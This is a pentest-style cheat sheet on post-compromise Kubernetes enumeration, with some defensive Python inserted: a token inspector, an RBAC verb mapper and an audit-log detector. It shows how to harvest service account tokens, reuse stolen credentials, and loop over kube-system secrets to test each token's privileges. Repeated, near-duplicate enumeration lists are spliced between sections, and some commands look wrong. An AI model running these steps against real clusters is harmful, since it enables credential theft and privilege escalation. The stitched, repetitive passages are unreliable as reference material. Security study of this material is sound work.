Kubernetes Enumeration

Kubernetes Tokens

If you have compromised access to a machine, the user may have access to a Kubernetes platform. The token is usually located in the file pointed to by the KUBECONFIG environment variable or inside ~/.kube.

In this folder you may find config files with tokens and the configuration needed to connect to the API server. You may also find a cache folder holding previously retrieved information.

If you have compromised a pod inside a Kubernetes environment, there are other places where you can find tokens and information about the current K8s environment:

Service Account Tokens

Before continuing, if you don't know what a Service Account is in Kubernetes, I suggest you follow this link and read at least the information about the Kubernetes architecture.

Taken from the Kubernetes documentation:

“When you create a pod, if you do not specify a service account, it is automatically assigned the default service account in the same namespace.”

A ServiceAccount is an object managed by Kubernetes and used to provide an identity for processes that run in a pod. Every service account has a secret associated with it, and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties.

Usually one of the directories:

  • /run/secrets/kubernetes.io/serviceaccount
  • /var/run/secrets/kubernetes.io/serviceaccount
  • /secrets/kubernetes.io/serviceaccount

contains the files:

  • ca.crt: the CA certificate used to verify Kubernetes communications
  • namespace: indicates the current namespace
  • token: contains the service account token of the current pod.
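Because the token file holds a JWT, its claims can be decoded to see which identity it carries and whether it ever expires. The following is an added example, not code from the original page: the function names are illustrative, the two sample tokens are constructed and unsigned, and the code only decodes the claims without verifying the signature.

```python
import base64
import json
import time


def b64url_decode(part):
    """Decode one base64url JWT segment, restoring the stripped '=' padding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def describe_sa_token(token, now=None):
    """Summarise a service account token's claims WITHOUT verifying the signature."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    header = json.loads(b64url_decode(parts[0]))
    claims = json.loads(b64url_decode(parts[1]))

    # The subject has the form system:serviceaccount:<namespace>:<name>.
    fields = claims.get("sub", "").split(":")
    if len(fields) != 4 or fields[:2] != ["system", "serviceaccount"]:
        raise ValueError("subject is not a service account")

    now = time.time() if now is None else now
    exp = claims.get("exp")
    bound = claims.get("kubernetes.io") or {}
    return {
        "alg": header.get("alg"),
        "namespace": fields[2],
        "service_account": fields[3],
        # Bound (projected) tokens carry exp and the pod they were issued to.
        # Legacy Secret-based tokens carry neither and do not expire on their own.
        "kind": "bound" if exp is not None else "legacy",
        "pod": (bound.get("pod") or {}).get("name"),
        "expires_in": None if exp is None else exp - now,
    }


def make_sample_token(claims):
    """Build a constructed, unsigned sample token (the signature is a dummy)."""
    def enc(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return ".".join([enc({"alg": "RS256", "typ": "JWT"}), enc(claims), "c2lnbmF0dXJl"])


# Constructed sample in the legacy (Secret-based) claim layout.
LEGACY_SAMPLE = make_sample_token({
    "iss": "kubernetes/serviceaccount",
    "kubernetes.io/serviceaccount/namespace": "default",
    "kubernetes.io/serviceaccount/secret.name": "default-token-sample",
    "kubernetes.io/serviceaccount/service-account.name": "default",
    "sub": "system:serviceaccount:default:default",
})

# Constructed sample in the bound (projected) claim layout.
BOUND_SAMPLE = make_sample_token({
    "aud": ["https://kubernetes.default.svc.cluster.local"],
    "iat": 1700000000,
    "exp": 1700003600,
    "iss": "https://kubernetes.default.svc.cluster.local",
    "kubernetes.io": {
        "namespace": "prod",
        "pod": {"name": "api-7c9d"},
        "serviceaccount": {"name": "api"},
    },
    "sub": "system:serviceaccount:prod:api",
})

if __name__ == "__main__":
    for sample in (LEGACY_SAMPLE, BOUND_SAMPLE):
        print(describe_sa_token(sample, now=1700000000))
```

A token reported as "legacy" is the kind worth rotating first during an audit, since nothing in the token itself limits its lifetime.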

Now that you have the token, you can find the API server inside the environment variable KUBECONFIG. For more information run (env; set) | grep -iE "kuber|kube"

The service account token is signed by the key residing in the file sa.key and validated by sa.pub.

Default location on Kubernetes:

  • /etc/kubernetes/pki

Default location on Minikube:

  • /var/lib/localkube/certs

Hot Pods

Hot pods are pods containing a privileged service account token. A privileged service account token is a token that has permission to perform privileged tasks such as listing secrets, creating pods, etc.

RBAC

If you don't know what RBAC is, read this section.

Enumeration CheatSheet

To enumerate a K8s environment you need the following:

  • A valid authentication token. In the previous section we saw where to look for a user token and for a service account token.
  • The address (https://host:port) of the Kubernetes API. This can usually be found in the environment variables and/or in the kube config file.
  • Optional: the ca.crt to verify the API server. It can be found in the same places as the token. It is useful for verifying the API server certificate, but with --insecure-skip-tls-verify in kubectl or -k in curl you won't need it.

With those details you can enumerate Kubernetes. If the API is for some reason accessible through the Internet, you can just download that information and enumerate the platform from your own host.

However, the API server is usually inside an internal network, so you will need to create a tunnel through the compromised machine to reach it from your machine, or you can upload the kubectl binary, or use curl/wget/anything to perform raw HTTP requests to the API server.

Differences between the list and get verbs

With get permissions you can access information about a specific asset (the describe option in kubectl) through the API:

GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}

If you have the list permission, you are allowed to execute API requests that list a type of asset (the get option in kubectl):

#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments

If you have the watch permission, you are allowed to execute API requests that monitor assets:

GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
GET /apis/apps/v1/watch/deployments  [DEPRECATED]

They open a streaming connection that returns the full manifest of a Deployment whenever it changes (or when a new one is created).
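The verb that RBAC evaluates is derived from the HTTP method and the shape of the URL, which is why the same GET can need get, list or watch. The following is an added example, not code from the original page or from Kubernetes: a simplified model of that mapping for resource paths only, with an illustrative function name, and it goes beyond the Deployment paths above by also covering subresources and the write verbs.

```python
from urllib.parse import parse_qs, urlsplit

NAMESPACE_SUBRESOURCES = {"status", "finalize"}
VERB_BY_METHOD = {"GET": "get", "HEAD": "get", "POST": "create",
                  "PUT": "update", "PATCH": "patch", "DELETE": "delete"}


def rbac_attributes(method, url):
    """Return (verb, apiGroup, resource, namespace, name) for a resource request."""
    parts = urlsplit(url)
    segs = [s for s in parts.path.split("/") if s]
    if len(segs) >= 3 and segs[0] == "api":
        group, rest = "", segs[2:]        # core group: /api/<version>/...
    elif len(segs) >= 4 and segs[0] == "apis":
        group, rest = segs[1], segs[3:]   # named group: /apis/<group>/<version>/...
    else:
        raise ValueError("not a resource request: %s" % parts.path)

    verb = VERB_BY_METHOD.get(method.upper())
    if verb is None:
        raise ValueError("unsupported method: %s" % method)

    # Deprecated form: a /watch/ prefix forces the watch verb.
    if rest[0] == "watch":
        verb, rest = "watch", rest[1:]
        if not rest:
            raise ValueError("watch prefix without a resource")

    # namespaces/<ns>/<resource>... scopes the request to <ns>.
    namespace = ""
    if rest[0] == "namespaces" and len(rest) > 1:
        namespace = rest[1]
        if len(rest) > 2 and rest[2] not in NAMESPACE_SUBRESOURCES:
            rest = rest[2:]

    resource = rest[0]
    name = rest[1] if len(rest) > 1 else ""
    if len(rest) > 2:
        resource += "/" + rest[2]         # subresource, e.g. pods/log

    # A GET on a collection is a list, or a watch when ?watch=true is set.
    if not name and verb == "get":
        watch = parse_qs(parts.query).get("watch", ["false"])[0].lower()
        verb = "watch" if watch in ("true", "1") else "list"
    # A DELETE on a collection needs its own verb.
    if not name and verb == "delete":
        verb = "deletecollection"
    return verb, group, resource, namespace, name


if __name__ == "__main__":
    for method, url in [
        ("GET", "/apis/apps/v1/namespaces/dev/deployments/web"),
        ("GET", "/apis/apps/v1/namespaces/dev/deployments"),
        ("GET", "/apis/apps/v1/deployments?watch=true"),
        ("GET", "/apis/apps/v1/watch/namespaces/dev/deployments"),
        ("GET", "/api/v1/namespaces/dev/pods/web-0/log"),
    ]:
        print(method, url, "->", rbac_attributes(method, url))
```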

The following kubectl commands only show how to list objects. If you want to access the data, use describe instead of get.

Using curl

From inside a pod you can use several environment variables:

export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl still returns a certificate error, use the -k option to work around it.

By default the pod can reach the kube-api server at the domain name kubernetes.default.svc, and you can see the kube network in /etc/resolv.conf, since there you will find the address of the Kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).

Using kubectl

Having the token and the address of the API server, you use kubectl or curl to access it as indicated here:

By default, the APISERVER communicates using the https:// scheme.

alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true'

If there is no https:// in the URL, you may get an error such as Bad Request.

You can find an official kubectl cheatsheet here. The goal of the following sections is to present, in an ordered manner, different options to enumerate and understand the new K8s environment you have obtained access to.

To see the HTTP requests that kubectl sends, you can use the parameter -v=8

MitM kubectl - Proxying kubectl

# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true

Current Configuration

kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>

If you managed to steal some user credentials, you can configure them locally using something like:

kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )

Get Supported Resources

With this information you will know all the services you can list

k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace

Get Current Privileges

k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileges in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>

Kubernetes Enumeration

  1. Using kubectl

    kubectl get all --all-namespaces
    kubectl get pods --all-namespaces
    kubectl get pods -o wide --all-namespaces
    kubectl get svc --all-namespaces
    kubectl get endpoints --all-namespaces
    kubectl get secrets --all-namespaces
    kubectl get configmaps --all-namespaces
    kubectl get roles --all-namespaces
    kubectl get rolebindings --all-namespaces
    kubectl get clusterroles
    kubectl get clusterrolebindings
  2. Using kubens

    kubens
    kubens -h
  3. Using kubectx

    kubectx
    kubectx -h

kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"

Another way to check your privileges is the tool https://github.com/corneliusweig/rakkess
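On the defensive side, the SelfSubjectRulesReview request above and the broad list calls that usually follow it are visible in the API server audit log. The following is an added example, not code from the original page: a sketch of detection logic over audit.k8s.io/v1 events, where the function names, thresholds and sample events are constructed for illustration.

```python
import json
from collections import defaultdict

SELF_REVIEWS = {"selfsubjectrulesreviews", "selfsubjectaccessreviews"}
SENSITIVE = {"secrets", "serviceaccounts", "roles", "rolebindings",
             "clusterroles", "clusterrolebindings"}


def find_enumeration(lines, min_sensitive=3, min_denied=2):
    """Return {username: [reasons]} for service accounts whose audit events
    look like permission discovery or a sweep over sensitive resources."""
    self_review = set()
    cluster_wide_secrets = set()
    attempted = defaultdict(set)   # sensitive resources each user tried to list
    denied = defaultdict(int)      # number of 403 responses per user

    for line in lines:
        try:
            ev = json.loads(line)
        except (TypeError, ValueError):
            continue  # skip truncated or non-JSON lines
        # A request is logged once per stage; count only the final one.
        if ev.get("stage") != "ResponseComplete":
            continue
        user = (ev.get("user") or {}).get("username", "")
        # Workloads rarely need to ask what they may do; people running kubectl do.
        if not user.startswith("system:serviceaccount:"):
            continue
        ref = ev.get("objectRef") or {}
        resource, verb = ref.get("resource", ""), ev.get("verb", "")

        if verb == "create" and resource in SELF_REVIEWS:
            self_review.add(user)
        if verb == "list" and resource in SENSITIVE:
            attempted[user].add(resource)
            if resource == "secrets" and not ref.get("namespace"):
                cluster_wide_secrets.add(user)
        if (ev.get("responseStatus") or {}).get("code") == 403:
            denied[user] += 1

    findings = {}
    for user in sorted(self_review | set(attempted) | set(denied)):
        reasons = []
        if user in self_review:
            reasons.append("self-review")
        if len(attempted[user]) >= min_sensitive:
            reasons.append("sensitive-list-sweep")
        if user in cluster_wide_secrets:
            reasons.append("cluster-wide-secrets-list")
        if denied[user] >= min_denied:
            reasons.append("repeated-403")
        if reasons:
            findings[user] = reasons
    return findings


def sample_event(user, verb, resource, namespace="", code=200,
                 stage="ResponseComplete"):
    """Serialise one constructed audit event as a log line."""
    ref = {"resource": resource}
    if namespace:
        ref["namespace"] = namespace
    return json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1",
                       "stage": stage, "verb": verb,
                       "user": {"username": user}, "objectRef": ref,
                       "responseStatus": {"code": code}})


WEB = "system:serviceaccount:default:web"
COLLECTOR = "system:serviceaccount:monitoring:collector"
# Constructed sample log, not taken from a real cluster.
SAMPLE_AUDIT_LINES = [
    sample_event(WEB, "create", "selfsubjectrulesreviews", stage="RequestReceived"),
    sample_event(WEB, "create", "selfsubjectrulesreviews", code=201),
    sample_event(WEB, "list", "secrets", code=403),
    sample_event(WEB, "list", "secrets", "default"),
    sample_event(WEB, "list", "roles", "default"),
    sample_event(WEB, "list", "clusterroles", code=403),
    sample_event(COLLECTOR, "list", "pods"),
    sample_event(COLLECTOR, "list", "nodes"),
    sample_event("alice@example.com", "create", "selfsubjectrulesreviews", code=201),
    "{truncated line",
]

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_AUDIT_LINES))
```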

You can learn more about Kubernetes RBAC in:

Kubernetes Role-Based Access Control (RBAC)

Once you know which privileges you have, check the following page to figure out whether you can abuse them to escalate privileges:

Abusing Roles/ClusterRoles in Kubernetes

Get Other Roles

k get roles
k get clusterroles

If you can read secrets, you can use the following lines to get the privileges related to each token:

for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done

Get Service Accounts

As discussed at the beginning of this page, when a pod is run a service account is usually assigned to it. Therefore, listing the service accounts, their permissions and where they are running may allow a user to escalate privileges.

k get serviceaccounts

Kubernetes Enumeration

Enumerating the API Server

  1. Request the API server version

    curl -k https://<kubernetes-apiserver>/version
  2. Request the API server endpoints

    curl -k https://<kubernetes-apiserver>/api
    curl -k https://<kubernetes-apiserver>/apis
  3. Request the API server resources

    curl -k https://<kubernetes-apiserver>/api/v1
    curl -k https://<kubernetes-apiserver>/apis/apps/v1
  4. Request namespaces

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces
  5. Request pods

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods
  6. Request services

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/services
  7. Request nodes

    curl -k https://<kubernetes-apiserver>/api/v1/nodes
  8. Request deployments

    curl -k https://<kubernetes-apiserver>/apis/apps/v1/namespaces/<namespace>/deployments
  9. Request ConfigMaps

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/configmaps
  10. Request Secrets

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/secrets
  11. Request RBAC information

    curl -k https://<kubernetes-apiserver>/apis/rbac.authorization.k8s.io/v1/clusterroles
    curl -k https://<kubernetes-apiserver>/apis/rbac.authorization.k8s.io/v1/clusterrolebindings
  12. Request StorageClasses

    curl -k https://<kubernetes-apiserver>/apis/storage.k8s.io/v1/storageclasses
  13. Request events

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/events
  14. Request Ingresses

    curl -k https://<kubernetes-apiserver>/apis/networking.k8s.io/v1/namespaces/<namespace>/ingresses
  15. Request NetworkPolicies

    curl -k https://<kubernetes-apiserver>/apis/networking.k8s.io/v1/namespaces/<namespace>/networkpolicies
  16. Request PodSecurityPolicies

    curl -k https://<kubernetes-apiserver>/apis/policy/v1beta1/podsecuritypolicies
  17. Request CustomResourceDefinitions

    curl -k https://<kubernetes-apiserver>/apis/apiextensions.k8s.io/v1/customresourcedefinitions
  18. Request metrics

    curl -k https://<kubernetes-apiserver>/apis/metrics.k8s.io/v1beta1/nodes
    curl -k https://<kubernetes-apiserver>/apis/metrics.k8s.io/v1beta1/pods
  19. Request pod logs

    curl -k https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log
  20. Request healthz

    curl -k https://<kubernetes-apiserver>/healthz
  21. Request the OpenAPI specification

    curl -k https://<kubernetes-apiserver>/openapi/v2
  22. Request the Swagger specification

    curl -k https://<kubernetes-apiserver>/swagger-2.0.0.json
  23. Request Kubelet information

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/stats/summary
  24. Request Kubelet logs

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/logs
  25. Request Kubelet metrics

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/metrics
  26. Request the Kubelet spec

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/spec
  27. Request Kubelet healthz

    curl -k https://<kubernetes-apiserver>/api/v1/nodes/<node>/proxy/healthz
  28. Request the logs of a specific container

    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>"
  29. Request exec on a pod

    curl -k -X POST "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/exec?command=<command>&container=<container>&stderr=true&stdout=true"
  30. Request port-forward on a pod

    curl -k -X POST "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/portforward?ports=<port>"
  31. Request attach on a pod

    curl -k -X POST "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/attach?container=<container>&stderr=true&stdout=true"
  32. Request the pod proxy

    curl -k -X POST https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/proxy
  33. Request pod logs with query parameters (tail, previous, timestamps, since, since time, byte limit)

    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?tailLines=100"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&tailLines=100"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&previous=true"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&timestamps=true"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceSeconds=3600"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&sinceTime=2021-01-01T00:00:00Z"
    curl -k "https://<kubernetes-apiserver>/api/v1/namespaces/<namespace>/pods/<pod>/log?container=<container>&limitBytes=10485760"

kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts

Get Deployments

Deployments specify the components that need to be run.

k get deployments
k get deployments -n custnamespace

Kubernetes Enumeration

Enumerating the API Server

  1. Enumerating the API server

    1.1. Get the API server address:

    kubectl cluster-info | grep -E 'Kubernetes (master|control plane)' | awk '/http/ {print $NF}'

    1.2. Make sure you can reach the API server:

    curl https://<API_SERVER_IP>:<API_SERVER_PORT> --insecure

    1.3. Use kubectl to enumerate the API server:

    kubectl get all --all-namespaces

    1.4. Use kubectl to enumerate the resource types:

    kubectl api-resources

    1.5. Use kubectl to enumerate a given resource type:

    kubectl get <RESOURCE_TYPE>

    1.6. Use kubectl to enumerate resources in a given namespace:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE>

    1.7. Use kubectl to get a resource by name:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE>

    1.8. Use kubectl to get resources in YAML format:

    kubectl get <RESOURCE_TYPE> -o yaml

    1.9. Use kubectl to get resources in JSON format:

    kubectl get <RESOURCE_TYPE> -o json

    1.10. Use kubectl to get a named resource in JSON format:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.11. Use kubectl to get a named resource in YAML format:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.12. Use kubectl to get the resources of a given namespace in YAML format:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE> -o yaml

    1.13. Use kubectl to get the resources of a given namespace in JSON format:

    kubectl get <RESOURCE_TYPE> -n <NAMESPACE> -o json

kurl -v https://$APISERVER/apis/apps/v1/namespaces/<namespace>/deployments/

Get Pods

Pods are the actual containers that will run.

k get pods
k get pods -n custnamespace

Kubernetes Enumeration

  1. Using kubectl

    • kubectl get pods
    • kubectl get deployments
    • kubectl get services
    • kubectl get configmaps
    • kubectl get secrets
    • kubectl get pv
    • kubectl get pvc
    • kubectl get nodes
    • kubectl get namespaces
    • kubectl get roles
    • kubectl get rolebindings
    • kubectl get clusterroles
    • kubectl get clusterrolebindings
    • kubectl get events

  2. Using kubens

    • kubens
    • kubens -h

  3. Using kubectx

    • kubectx
    • kubectx -h

  4. Using kubectx and kubens

    • kubectx
    • kubens


kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/

Get Services

Kubernetes services are used to expose a service on a specific port and IP (which acts as a load balancer for the pods that actually provide the service). This is useful for knowing where you can find other services to try to attack.

k get services
k get services -n custnamespace

Kubernetes Enumeration

Enumerating the API Server

  1. Enumerating the API Server

    1.1. Get the API server address:

    kubectl cluster-info | grep 'Kubernetes master' | awk '/http/ {print $NF}'

    1.2. Check that you can reach the API server:

    curl https://<API_SERVER_IP>:<API_SERVER_PORT>/version --insecure

  2. Enumerating Kubernetes Resources

    2.1. List the available resources:

    kubectl api-resources --verbs=list --namespaced -o name | xargs -n 1 kubectl get --show-kind --ignore-not-found

    2.2. Get more information about a particular resource:

    kubectl explain <RESOURCE>

  3. Enumerating Namespaces

    3.1. List the namespaces:

    kubectl get namespaces

    3.2. List the resources in a particular namespace:

    kubectl get all -n <NAMESPACE>

  4. Enumerating Service Accounts

    4.1. List the service accounts:

    kubectl get serviceaccounts

    4.2. Get more details about a particular service account:

    kubectl describe serviceaccount <SERVICE_ACCOUNT_NAME>

  5. Enumerating Roles and Role Bindings

    5.1. List the roles:

    kubectl get roles

    5.2. List the role bindings in a particular namespace:

    kubectl get rolebindings -n <NAMESPACE>

  6. Enumerating Certificates (Certificate Signing Requests)

    6.1. List the certificate signing requests:

    kubectl get csr

    6.2. Approve a certificate signing request:

    kubectl certificate approve <CSR_NAME>

  7. Enumerating Security Settings

    7.1. Get the current pod security policies:

    kubectl get podsecuritypolicies

    7.2. Get more details about a security policy:

    kubectl describe podsecuritypolicy <POD_SECURITY_POLICY_NAME>

  8. Enumerating Network Settings

    8.1. Get the network policies:

    kubectl get networkpolicies

    8.2. Get more details about a network policy:

    kubectl describe networkpolicy <NETWORK_POLICY_NAME>

  9. Enumerating Storage Settings

    9.1. Get the storage classes:

    kubectl get storageclasses

    9.2. Get more details about a storage class:

    kubectl describe storageclass <STORAGE_CLASS_NAME>

  10. Enumerating Access Control Settings

    10.1. List the access control policies (cluster roles):

    kubectl get clusterroles

    10.2. Get more details about an access control policy:

    kubectl describe clusterrole <CLUSTER_ROLE_NAME>

  11. Enumerating Namespace Access Control Settings

    11.1. List the cluster role bindings:

    kubectl get clusterrolebindings

    11.2. Get more details about a cluster role binding:

    kubectl describe clusterrolebinding <CLUSTER_ROLE_BINDING_NAME>

  12. Enumerating Service Account Access Control Settings

    12.1. List the service accounts:

    kubectl get serviceaccount

    12.2. Get more details about a service account:

    kubectl describe serviceaccount <SERVICE_ACCOUNT_NAME>

  13. Enumerating Certificate Access Control Settings

    13.1. List the certificate signing requests:

    kubectl get certificatesigningrequests

    13.2. Get more details about a certificate signing request:

    kubectl describe certificatesigningrequest <CSR_NAME>

  14. Enumerating Role Access Control Settings

    14.1. List the role bindings:

    kubectl get rolebindings

    14.2. Get more details about a role binding:

    kubectl describe rolebinding <ROLE_BINDING_NAME>
kurl -v https://$APISERVER/api/v1/namespaces/default/services/

Get nodes

Get all the nodes configured inside the cluster.

k get nodes

Kubernetes Enumeration

Enumerating the API Server

  1. Enumerating the API Server Endpoint

    Test access to the API server from inside the Kubernetes cluster:

    curl -k https://kubernetes.default.svc

    Test access to the API server from outside the Kubernetes cluster:

    curl -k https://<kubernetes-master-ip>

  2. Using kubectl

    Use kubectl to enumerate the API server:

    kubectl get all --all-namespaces

  3. Using kubeadm

    Use kubeadm to enumerate the API server:

    kubeadm config view

  4. Using etcd

    Get API server details from etcd:

    etcdctl get / --prefix --keys-only

Enumerating Nodes

    Use kubectl to enumerate nodes:

    kubectl get nodes

Enumerating Services

    Use kubectl to enumerate services:

    kubectl get services --all-namespaces

Enumerating Storage

    Use kubectl to enumerate storage classes:

    kubectl get storageclasses

Enumerating RBAC

    Use kubectl to enumerate Role-Based Access Control (RBAC):

    kubectl get roles --all-namespaces

Enumerating Network Policies

    Use kubectl to enumerate network policies:

    kubectl get networkpolicies --all-namespaces

Enumerating Ingress Resources

    Use kubectl to enumerate Ingress resources:

    kubectl get ingresses --all-namespaces

Enumerating ConfigMaps

    Use kubectl to enumerate ConfigMaps:

    kubectl get configmaps --all-namespaces

Enumerating Secrets

    Use kubectl to enumerate secrets:

    kubectl get secrets --all-namespaces

Enumerating Persistent Volumes

    Use kubectl to enumerate persistent volumes:

    kubectl get persistentvolumes

Enumerating Namespaces

    Use kubectl to enumerate namespaces:

    kubectl get namespaces

Enumerating Events

    Use kubectl to enumerate events:

    kubectl get events --all-namespaces

Enumerating Custom Resource Definitions (CRDs)

    Use kubectl to enumerate Custom Resource Definitions (CRDs):

    kubectl get crds

Enumerating API Resources

    Use kubectl to enumerate API resources:

    kubectl api-resources

Enumerating API Versions

    Use kubectl to enumerate API versions:

    kubectl api-versions

kurl -v https://$APISERVER/api/v1/nodes/

Get DaemonSets

DaemonSets make it possible to ensure that a specific pod runs on all nodes of the cluster (or on the selected ones). If you delete the DaemonSet, the pods it manages are removed as well.

k get daemonsets

Kubernetes Enumeration

Enumerating the API Server

  1. Request basic information from the API server

    curl -k https://<kubernetes-apiserver>:<port>/version

  2. Use kubectl to enumerate the API server

    kubectl cluster-info
    kubectl get pods --all-namespaces
    kubectl get nodes
    kubectl get namespaces

  3. Use kubeadm to enumerate the API server

    kubeadm config view

Enumerating the Kubelet

  1. Request information from the Kubelet

    curl -k https://<kubelet>:10250/pods

  2. Use kubectl to enumerate the Kubelet

    kubectl get --raw /api/v1/namespaces/default/pods

Enumerating Kube-Proxy

  1. Request information from Kube-Proxy

    curl -k https://<kube-proxy>:10249/proxy

Enumerating Etcd

  1. Request information from Etcd

    etcdctl --endpoints=https://<etcd>:2379 member list

  2. Use kubectl to enumerate Etcd

    kubectl exec -it etcd-<etcd-pod-name> -- sh
    etcdctl member list

Enumerating Service Account Tokens

  1. Enumerate service account tokens on nodes

    find /var/lib/kubelet -name 'token.csv' -exec cat {} \;

  2. Enumerate service account tokens in containers

    kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.serviceAccountName}{"\n"}{end}'

Enumerating RBAC

  1. Enumerate role bindings

    kubectl get rolebindings --all-namespaces

  2. Enumerate cluster role bindings

    kubectl get clusterrolebindings

  3. Enumerate roles

    kubectl get roles --all-namespaces

  4. Enumerate cluster roles

    kubectl get clusterroles

Enumerating Network Policies

    kubectl get networkpolicies --all-namespaces

Enumerating Ingress Resources

    kubectl get ingresses --all-namespaces

Enumerating Persistent Volumes

    kubectl get pv

Enumerating Storage Classes

    kubectl get storageclasses

Enumerating Events

    kubectl get events --all-namespaces

Enumerating Config Maps

    kubectl get configmaps --all-namespaces

Enumerating Secrets

    kubectl get secrets --all-namespaces

Enumerating Custom Resource Definitions (CRDs)

    kubectl get crds

Enumerating Helm Charts

    helm ls --all-namespaces

Enumerating Open Policy Agent (OPA) Policies

    kubectl get configmaps -n kube-system

Enumerating Audit Logs

    kubectl get events -n kube-system --sort-by='.metadata.creationTimestamp'

Enumerating Service Endpoints

    kubectl get endpoints --all-namespaces

Enumerating Helm Tiller

    kubectl get deploy -n kube-system tiller-deploy

Enumerating Prometheus Metrics

    kubectl port-forward -n monitoring prometheus-prometheus-oper-prometheus-<id> 9090

Enumerating Grafana Dashboards

    kubectl port-forward -n monitoring grafana-<id> 3000

Enumerating Kube-State-Metrics

    kubectl port-forward -n monitoring kube-state-metrics-<id> 8080

Enumerating Kube-Proxy Metrics

    kubectl port-forward -n kube-system kube-proxy-<id> 10249

Enumerating Kubelet Metrics

    kubectl port-forward -n kube-system kubelet-<node-name> 10250
    kubectl port-forward -n kube-system kubelet-<id> 10255

Enumerating Etcd Metrics

    kubectl port-forward -n kube-system etcd-<node-name> 2379

Enumerating CoreDNS Metrics

    kubectl port-forward -n kube-system coredns-<id> 9153

Enumerating Kube-Controller-Manager Metrics

    kubectl port-forward -n kube-system kube-controller-manager-<id> 10252

Enumerating Kube-Scheduler Metrics

    kubectl port-forward -n kube-system kube-scheduler-<id> 10251

Enumerating Kube-API-Server Metrics

    kubectl port-forward -n kube-system kube-apiserver-<id> 10249

Enumerating Kubelet Healthz

